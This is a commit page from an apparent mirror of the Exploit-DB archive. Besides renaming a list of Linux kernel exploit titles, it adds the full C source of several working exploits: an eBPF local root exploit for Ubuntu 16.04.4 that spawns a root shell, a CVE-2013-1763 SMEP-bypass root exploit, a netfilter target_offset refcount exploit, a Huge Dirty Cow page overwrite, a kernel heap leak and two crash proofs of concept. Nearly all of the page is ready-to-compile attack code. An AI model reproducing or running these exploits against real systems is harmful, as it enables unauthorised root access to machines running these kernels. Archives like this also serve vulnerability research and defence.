bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-03-20

Browse source 
9 changes to exploits/shellcodes

Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak
Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak

Linux 2.6.36 IGMP - Remote Denial of Service
Linux Kernel 2.6.36 IGMP - Remote Denial of Service

Linux - SELinux W+X Protection Bypass via AIO
Linux SELinux - W+X Protection Bypass via AIO

Linux group_info refcounter - Overflow Memory Corruption
Linux Kernel - 'group_info' refcounter Overflow Memory Corruption

Linux io_submit L2TP sendmsg - Integer Overflow
Linux Kernel - io_submit L2TP sendmsg Integer Overflow

Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited
Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited

Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read
Linux Kernel (ARM/ARM64) - 'perf_event_open()' Arbitrary Memory Read

Linux - 'mincore()' Uninitialized Kernel Heap Page Disclosure
Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure

Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)
Linux Kernel < 4.5.1 - Off-By-One (PoC)
Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)

Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH
Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) - libc NLSPATH

Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow
Linux libc 5.3.12/5.4 (RedHat Linux 4.0) - 'vsyslog()' Local Buffer Overflow

Linux 6.1/6.2/7.0/7.1 Man Page - Source Buffer Overflow
Linux Man Page 6.1/6.2/7.0/7.1- Source Buffer Overflow

Linux VServer Project 1.2x - CHRoot Breakout
Linux VServer Project 1.2x - Chroot Breakout
Linux espfix64 - Nested NMIs Interrupting Privilege Escalation
Linux (x86) - Memory Sinkhole Privilege Escalation
Linux Kernel - 'espfix64' Nested NMIs Interrupting Privilege Escalation
Linux Kernel (x86) - Memory Sinkhole Privilege Escalation

Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass
Linux Kernel 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass

Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation
Linux Kernel - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) -  'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) -  'netfilter target_offset' Local Privilege Escalation
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation
Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation
Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation
This commit is contained in:
Offensive Security 2018-03-20 05:01:55 +00:00
parent b0fc7bfd43
commit 224c305b0d
10 changed files with 1788 additions and 17 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

45
exploits/hardware/local/44306.c Normal file
View file

@ -0,0 +1,45 @@
/*
*
* HuaWei Mate7 hifi driver Poc
*
* Writen by pray3r, <pray3r.z@gmail.com>
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#define HIFI_MISC_IOCTL_WRITE_PARAMS _IOWR('A', 0x75, struct misc_io_sync_param)
struct misc_io_sync_param {
void * para_in;
unsigned int para_size_in;
void * para_out;
unsigned int para_size_out;
};
int main(int arg, char **argv)
{
int fd;
void *in = malloc(300 * 1024);
void *out = malloc(100);
struct misc_io_sync_param poc;
poc.para_in = in;
poc.para_size_in = 300 * 1024;
poc.para_out = out;
poc.para_size_out = 100;
fd = open("/dev/hifi_misc", O_RDWR);
ioctl(fd, HIFI_MISC_IOCTL_WRITE_PARAMS, &poc);
free(in);
free(out);
return 0;
}

263
exploits/linux/dos/44301.c Normal file
View file

@ -0,0 +1,263 @@
/**
EDB Note ~ Download: http://cyseclabs.com/exploits/matreshka.c
Blog ~ http://cyseclabs.com/blog/cve-2016-6187-heap-off-by-one-exploit
**/
/**
* Quick and dirty PoC for CVE-2016-6187 heap off-by-one PoC
* By Vitaly Nikolenko
* vnik@cyseclabs.com
*
* There's no privilege escalation payload but the kernel will execute
* instructions from 0xdeadbeef.
*
* gcc matreshka.c -o matreshka -lpthread
*
* greetz to dmr and s1m0n
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <string.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <linux/userfaultfd.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <strings.h>
#include <unistd.h>
#include <asm/unistd.h>
#include <poll.h>
#include <pthread.h>
#include <stdint.h>
void setup_pagefault(void *, unsigned, uint8_t);
const int pagesize = 4096;
struct {
long mtype;
char mtext[48];
} msg;
struct thread_struct {
int fd;
uint8_t h_sw; // handler switch
uint8_t count;
};
struct subprocess_info {
long a; long b; long c; long d; // 32 bytes for work_struct
long *complete;
char *path;
char **argv;
char **envp;
int wait;
int retval;
int (*init)(void);
int (*cleanup)(void);
void *data;
};
void *pf_handler(void *data) {
struct thread_struct *params = data;
int count = params->count;
int fd = params->fd;
for (;;) {
struct uffd_msg msg;
struct pollfd pollfd[1];
pollfd[0].fd = params->fd;
pollfd[0].events = POLLIN;
int pollres;
pollres = poll(pollfd, 1, -1);
switch (pollres) {
case -1:
perror("poll userfaultfd");
continue;
break;
case 0: continue; break;
case 1: break;
default:
exit(2);
}
if (pollfd[0].revents & POLLERR) {
exit(1);
}
if (!(pollfd[0].revents & POLLIN)) {
continue;
}
int readret;
readret = read(fd, &msg, sizeof(msg));
if (readret == -1) {
if (errno == EAGAIN)
continue;
perror("read userfaultfd");
}
if (readret != sizeof(msg)) {
fprintf(stderr, "short read, not expected, exiting\n");
exit(1);
}
long long addr = msg.arg.pagefault.address;
char buf[pagesize];
long *ptr = (long *)buf;
// just for lolz
memset(buf, 'B', pagesize);
struct uffdio_copy cp;
cp.src = (long long)buf;
cp.dst = (long long)(addr & ~(0x1000 - 1));
cp.len = (long long)pagesize;
cp.mode = 0;
void *tmp_addr;
if (count != 3) {
if (count % 2)
tmp_addr = (void *)(0x40000000 & ~(0x1000 - 1));
else
tmp_addr = (void *)((0x40000000 & ~(0x1000 - 1)) + 0x1000);
// remap and set up the page fault hander
munmap(tmp_addr, 0x1000);
void *region = mmap(tmp_addr, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0);
setup_pagefault(tmp_addr, 0x1000, ++count);
} else {
// change the first page which is already mmaped
struct subprocess_info *p = (struct subprocess_info *)(0x40000000 + 0x1000 - 88);
p->path = 0;
p->cleanup = (void *)0xdeadbeef;
}
if (ioctl(fd, UFFDIO_COPY, &cp) == -1) {
perror("ioctl(UFFDIO_COPY)");
}
}
return NULL;
}
void setup_pagefault(void *addr, unsigned size, uint8_t count) {
void *region;
int uffd;
pthread_t uffd_thread;
struct uffdio_api uffdio_api;
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
perror("syscall");
return;
}
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
// just to be nice
if (ioctl(uffd, UFFDIO_API, &uffdio_api)) {
fprintf(stderr, "UFFDIO_API\n");
exit(1);
}
if (uffdio_api.api != UFFD_API) {
fprintf(stderr, "UFFDIO_API error %Lu\n", uffdio_api.api);
exit(1);
}
struct uffdio_register uffdio_register;
uffdio_register.range.start = (unsigned long)addr;
uffdio_register.range.len = size;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
perror("ioctl(UFFDIO_REGISTER)");
exit(1);
}
printf("userfaultfd ioctls: 0x%llx\n", uffdio_register.ioctls);
int expected = UFFD_API_RANGE_IOCTLS;
if ((uffdio_register.ioctls & expected) != expected) {
fprintf(stderr, "ioctl set is incorrect\n");
exit(1);
}
struct thread_struct thr_params;
struct thread_struct *params = (struct thread_struct *)malloc(sizeof(struct thread_struct));
params->fd = uffd;
params->count = count;
pthread_create(&uffd_thread, NULL, pf_handler, (void *)params);
}
int main(int argc, char **argv) {
void *region, *map;
pthread_t uffd_thread;
int uffd, msqid, i;
region = (void *)mmap((void *)0x40000000, 0x2000, PROT_READ|PROT_WRITE,
MAP_FIXED|MAP_PRIVATE|MAP_ANON, -1, 0);
if (!region) {
perror("mmap");
exit(2);
}
setup_pagefault(region + 0x1000, 0x1000, 1);
printf("my pid = %d\n", getpid());
if (!map) {
perror("mmap");
}
//memset(msg.mtext, 'A', sizeof(msg.mtext)-1);
unsigned long *p = (unsigned long *)msg.mtext;
for (i = 0; i < 6; i++) {
*p ++ = 0x0000000040000000 + 0x1000 - 88;
}
msg.mtype = 1;
msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
for (i = 0; i < 320; i++) { // that's generally the limit
if (msgsnd(msqid, &msg, 48, 0) == -1) {
perror("msgsnd");
return -1;
}
}
char buf[96];
p = (unsigned long *)buf;
for (i = 0; i < 11; i++) {
*p ++ = 0x40000000 + 0x1000 - 88;
}
*p ++ = 0xfffffffffffffff;
int fd = open("/proc/self/attr/current", O_RDWR);
write(fd, buf, 96);
// go figure why we do it 3 times
msgsnd(msqid, &msg, 48, 0);
msgsnd(msqid, &msg, 48, 0);
msgsnd(msqid, &msg, 48, 0);
socket(22, AF_INET, 0);
close(fd);
return 0;
}

40
exploits/linux/dos/44304.c Normal file
View file

@ -0,0 +1,40 @@
/*
* The source is modified from
* https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
* I try to find out infomation useful from the infoleak
* The kernel address can be easily found out from the uninitialized memory
* leaked from kernel, which can help bypass kaslr
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>
#include <err.h>
#include <stdio.h>
int main(void) {
unsigned char buf[getpagesize()/sizeof(unsigned char)];
int right = 1;
unsigned long addr = 0;
/* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)
err(1, "mmap");
while(right){
/* Touch a mishandle with this type mapping */
if (mincore((void*)0x86000000, 0x1000000, buf))
perror("mincore");
for( int n=0; n<getpagesize()/sizeof(unsigned char); n++) {
addr = *(unsigned long*)(&buf[n]);
/* Kernel address space, may need some mask&offset */
if(addr > 0xffffffff00000000){
right = 0;
goto out;
}
}
}
out:
printf("%p\n", addr);
return 0;
}

91
exploits/linux/dos/44305.c Normal file
View file

@ -0,0 +1,91 @@
/*
* The code is modified from https://www.exploit-db.com/exploits/43199/
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>
#include <err.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sched.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/wait.h>
#define TRIES_PER_PAGE (20000000)
#define PAGE_SIZE (0x1000)
#define MEMESET_VAL (0x41)
#define MAP_SIZE (0x200000)
#define STRING "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#define OFFSIZE ((sizeof(STRING)-1)/sizeof(char))
struct args{
int fd;
void *p;
int stop;
off_t off;
char *chp;
};
void *write_thread(struct args *arg) {
for (int i = 0; i < TRIES_PER_PAGE && !arg->stop; i++) {
lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);
write(arg->fd, STRING, sizeof(STRING));
lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);
}
return NULL;
}
void *wait_for_success(struct args *arg) {
while(*(arg->chp+arg->off*OFFSIZE) != 'A') {
int i = madvise(arg->p, MAP_SIZE, MADV_DONTNEED);
sched_yield();
}
arg->stop = 1;
return NULL;
}
int main(void) {
struct args arg;
arg.off = 0;
arg.p = mmap((void*)0x40000000, MAP_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if(arg.p == MAP_FAILED)
perror("[!] mmap()");
arg.chp = arg.p;
printf("mmap address is %p\n", arg.p);
madvise(arg.p, MAP_SIZE, MADV_HUGEPAGE);
arg.fd = open("/proc/self/mem", O_RDWR);
if (arg.fd < 0) {
perror("[!] open()");
return 1;
}
while(arg.off < PAGE_SIZE/sizeof(STRING)) {
arg.stop = 0;
pthread_t thread0, thread1;
int ret = pthread_create(&thread0, NULL, (void *)wait_for_success, &arg);
ret |= pthread_create(&thread1, NULL, (void *)write_thread, &arg);
if (ret) {
perror("[!] pthread_create()");
return 1;
}
pthread_join(thread0, NULL);
pthread_join(thread1, NULL);
printf("[*] Done 0x%x String\n", arg.off);
arg.off++;
}
printf("[*] Overwrite a page\n");
printf("%s\n", arg.p);
return 0;
}

247
exploits/linux/local/44298.c Normal file
View file

@ -0,0 +1,247 @@
/*
* Ubuntu 16.04.4 kernel priv esc
*
* all credits to @bleidl
* - vnik
*/
// Tested on:
// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
// if different kernel adjust CRED offset + check kernel stack size
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>
#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328
int sockets[2];
int mapfd, progfd;
char *__prog = "\xb4\x09\x00\x00\xff\xff\xff\xff"
"\x55\x09\x02\x00\xff\xff\xff\xff"
"\xb7\x00\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x18\x19\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x00\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x06\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x01\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x07\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x02\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x08\x00\x00\x00\x00\x00\x00"
"\xbf\x02\x00\x00\x00\x00\x00\x00"
"\xb7\x00\x00\x00\x00\x00\x00\x00"
"\x55\x06\x03\x00\x00\x00\x00\x00"
"\x79\x73\x00\x00\x00\x00\x00\x00"
"\x7b\x32\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x55\x06\x02\x00\x01\x00\x00\x00"
"\x7b\xa2\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x7b\x87\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00";
char bpf_log_buf[LOG_BUF_SIZE];
static int bpf_prog_load(enum bpf_prog_type prog_type,
const struct bpf_insn *insns, int prog_len,
const char *license, int kern_version) {
union bpf_attr attr = {
.prog_type = prog_type,
.insns = (__u64)insns,
.insn_cnt = prog_len / sizeof(struct bpf_insn),
.license = (__u64)license,
.log_buf = (__u64)bpf_log_buf,
.log_size = LOG_BUF_SIZE,
.log_level = 1,
};
attr.kern_version = kern_version;
bpf_log_buf[0] = 0;
return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}
static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
int max_entries) {
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries
};
return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}
static int bpf_update_elem(uint64_t key, uint64_t value) {
union bpf_attr attr = {
.map_fd = mapfd,
.key = (__u64)&key,
.value = (__u64)&value,
.flags = 0,
};
return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}
static int bpf_lookup_elem(void *key, void *value) {
union bpf_attr attr = {
.map_fd = mapfd,
.key = (__u64)key,
.value = (__u64)value,
};
return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}
static void __exit(char *err) {
fprintf(stderr, "error: %s\n", err);
exit(-1);
}
static void prep(void) {
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
if (mapfd < 0)
__exit(strerror(errno));
progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);
if (progfd < 0)
__exit(strerror(errno));
if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
__exit(strerror(errno));
if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
__exit(strerror(errno));
}
static void writemsg(void) {
char buffer[64];
ssize_t n = write(sockets[0], buffer, sizeof(buffer));
if (n < 0) {
perror("write");
return;
}
if (n != sizeof(buffer))
fprintf(stderr, "short write: %lu\n", n);
}
#define __update_elem(a, b, c) \
bpf_update_elem(0, (a)); \
bpf_update_elem(1, (b)); \
bpf_update_elem(2, (c)); \
writemsg();
static uint64_t get_value(int key) {
uint64_t value;
if (bpf_lookup_elem(&key, &value))
__exit(strerror(errno));
return value;
}
static uint64_t __get_fp(void) {
__update_elem(1, 0, 0);
return get_value(2);
}
static uint64_t __read(uint64_t addr) {
__update_elem(0, addr, 0);
return get_value(2);
}
static void __write(uint64_t addr, uint64_t val) {
__update_elem(2, addr, val);
}
static uint64_t get_sp(uint64_t addr) {
return addr & ~(0x4000 - 1);
}
static void pwn(void) {
uint64_t fp, sp, task_struct, credptr, uidptr;
fp = __get_fp();
if (fp < PHYS_OFFSET)
__exit("bogus fp");
sp = get_sp(fp);
if (sp < PHYS_OFFSET)
__exit("bogus sp");
task_struct = __read(sp);
if (task_struct < PHYS_OFFSET)
__exit("bogus task ptr");
printf("task_struct = %lx\n", task_struct);
credptr = __read(task_struct + CRED_OFFSET); // cred
if (credptr < PHYS_OFFSET)
__exit("bogus cred ptr");
uidptr = credptr + UID_OFFSET; // uid
if (uidptr < PHYS_OFFSET)
__exit("bogus uid ptr");
printf("uidptr = %lx\n", uidptr);
__write(uidptr, 0); // set both uid and gid to 0
if (getuid() == 0) {
printf("spawning root shell\n");
system("/bin/bash");
exit(0);
}
__exit("not vulnerable?");
}
int main(int argc, char **argv) {
prep();
pwn();
return 0;
}

153
exploits/linux/local/44299.c Normal file
View file

@ -0,0 +1,153 @@
/**
* based on the exploit by SynQ
*
* Modified PoC for CVE-2013-1763 with SMEP bypass
* Presentation: Practical SMEP Bypass Techniques on Linux
* Vitaly Nikolenko
* vnik@cyseclabs.com
*
* Target: Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
*
* gcc sockdiag_smep.c -O2 -o pwn
*/
/**
EDB Note: Video ~ https://youtu.be/jHJd-5NvWlQ
**/
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/inet_diag.h>
#include <sys/mman.h>
#include <assert.h>
//#include <linux/sock_diag.h>
//#include <linux/unix_diag.h>
//#include <linux/netlink.h>
#include "sock_diag.h"
#include "unix_diag.h"
#include "netlink.h"
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
static void saveme() {
asm(
"movq %%cs, %0\n"
"movq %%ss, %1\n"
"pushfq\n"
"popq %2\n"
: "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory" );
}
void shell(void) {
if(!getuid())
system("/bin/sh");
exit(0);
}
static void restore() {
asm volatile(
"swapgs ;"
"movq %0, 0x20(%%rsp)\t\n"
"movq %1, 0x18(%%rsp)\t\n"
"movq %2, 0x10(%%rsp)\t\n"
"movq %3, 0x08(%%rsp)\t\n"
"movq %4, 0x00(%%rsp)\t\n"
"iretq"
: : "r" (user_ss),
"r" ((unsigned long)0x36000000),
"r" (user_rflags),
"r" (user_cs),
"r" (shell)
);
}
int __attribute__((regparm(3)))
kernel_code()
{
commit_creds(prepare_kernel_cred(0));
restore();
return -1;
}
int main(int argc, char*argv[])
{
int fd;
struct sock_diag_handler {
__u8 family;
int (*dump)(void *a, void *b);
};
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
printf("Can't create sock diag socket\n");
return -1;
}
void *mapped;
void *fakestruct;
struct sock_diag_handler a;
a.dump = (void *)0xffffffff8100b74f;
commit_creds = (_commit_creds) 0xffffffff8107ee30;
prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107f0c0;
assert((fakestruct = mmap((void *)0x10000, 0x10000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE, 0, 0)) == (void*)0x10000);
memcpy(fakestruct+0xad38, &a, sizeof(a));
assert((mapped = mmap((void*)0x35000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, 0, 0)) == (void*)0x35000000);
unsigned long *fakestack = (unsigned long *)mapped;
*fakestack ++= 0xffffffff01661ef4;
int p;
for (p = 0; p < 0x1000000; p++)
*fakestack ++= 0xffffffff8100ad9eUL;
fakestack = (unsigned long *)(mapped + 0x7000000);
printf("[+] fake stack addr = %lx\n", (long unsigned)fakestack);
*fakestack ++= 0xffffffff8133dc8fUL;
*fakestack ++= 0x407e0;
*fakestack ++= 0xffffffff810032edUL;
*fakestack ++= 0xdeadbeef;
*fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode
memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;
req.r.sdiag_family = 45;
req.r.udiag_states = -1;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
saveme();
if ( send(fd, &req, sizeof(req), 0) < 0) {
printf("bad send\n");
close(fd);
return -1;
}
}

267
exploits/linux/local/44300.c Normal file
View file

@ -0,0 +1,267 @@
/**
EDB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44300.zip
Video ~ https://www.youtube.com/watch?v=qchiJn94kTo
**/
/** decr.c **/
/**
* Ubuntu 16.04 local root exploit - netfilter target_offset OOB
* check_compat_entry_size_and_hooks/check_entry
*
* Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
*
* Vitaly Nikolenko
* vnik@cyseclabs.com
* 23/04/2016
*
*
* ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
* automatic loading).
*
* vnik@ubuntu:~$ uname -a
* Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
* vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
* vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
* vnik@ubuntu:~$ ./decr
* netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
* [!] Decrementing the refcount. This may take a while...
* [!] Wait for the "Done" message (even if you'll get the prompt back).
* vnik@ubuntu:~$ [+] Done! Now run ./pwn
*
* vnik@ubuntu:~$ ./pwn
* [+] Escalating privs...
* root@ubuntu:~# id
* uid=0(root) gid=0(root) groups=0(root)
* root@ubuntu:~#
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <linux/sched.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ptrace.h>
#include <netinet/in.h>
#include <net/if.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <sys/mman.h>
#define MALLOC_SIZE 66*1024
int check_smaep() {
FILE *proc_cpuinfo;
char fbuf[512];
proc_cpuinfo = fopen("/proc/cpuinfo", "r");
if (proc_cpuinfo < 0) {
perror("fopen");
return -1;
}
memset(fbuf, 0, sizeof(fbuf));
while(fgets(fbuf, 512, proc_cpuinfo) != NULL) {
if (strlen(fbuf) == 0)
continue;
if (strstr(fbuf, "smap") || strstr(fbuf, "smep")) {
fclose(proc_cpuinfo);
return -1;
}
}
fclose(proc_cpuinfo);
return 0;
}
int check_mod() {
FILE *proc_modules;
char fbuf[256];
proc_modules = fopen("/proc/modules", "r");
if (proc_modules < 0) {
perror("fopen");
return -1;
}
memset(fbuf, 0, sizeof(fbuf));
while(fgets(fbuf, 256, proc_modules) != NULL) {
if (strlen(fbuf) == 0)
continue;
if (!strncmp("ip_tables", fbuf, 9)) {
fclose(proc_modules);
return 0;
}
}
fclose(proc_modules);
return -1;
}
int decr(void *p) {
int sock, optlen;
int ret;
void *data;
struct ipt_replace *repl;
struct ipt_entry *entry;
struct xt_entry_match *ematch;
struct xt_standard_target *target;
unsigned i;
sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock == -1) {
perror("socket");
return -1;
}
data = malloc(MALLOC_SIZE);
if (data == NULL) {
perror("malloc");
return -1;
}
memset(data, 0, MALLOC_SIZE);
repl = (struct ipt_replace *) data;
repl->num_entries = 1;
repl->num_counters = 1;
repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
repl->valid_hooks = 0;
entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
entry->target_offset = 74; // overwrite target_offset
entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);
ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));
strcpy(ematch->u.user.name, "icmp");
void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
uint64_t *me = (uint64_t *)(kmatch + 0x58);
*me = 0xffffffff821de10d; // magic number!
uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
*match = (uint32_t)kmatch;
ematch->u.match_size = (short)0xffff;
target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
uint32_t *t = (uint32_t *)target;
*t = (uint32_t)kmatch;
printf("[!] Decrementing the refcount. This may take a while...\n");
printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");
for (i = 0; i < 0xffffff/2+1; i++) {
ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
}
close(sock);
free(data);
printf("[+] Done! Now run ./pwn\n");
return 0;
}
int main(void) {
void *stack;
int ret;
printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");
if (check_mod()) {
printf("[-] No ip_tables module found! Quitting...\n");
return -1;
}
if (check_smaep()) {
printf("[-] SMEP/SMAP support dectected! Quitting...\n");
return -1;
}
ret = unshare(CLONE_NEWUSER);
if (ret == -1) {
perror("unshare");
return -1;
}
stack = (void *) malloc(65536);
if (stack == NULL) {
perror("malloc");
return -1;
}
clone(decr, stack + 65536, CLONE_NEWNET, NULL);
sleep(1);
return 0;
}
/** decr.c EOF **/
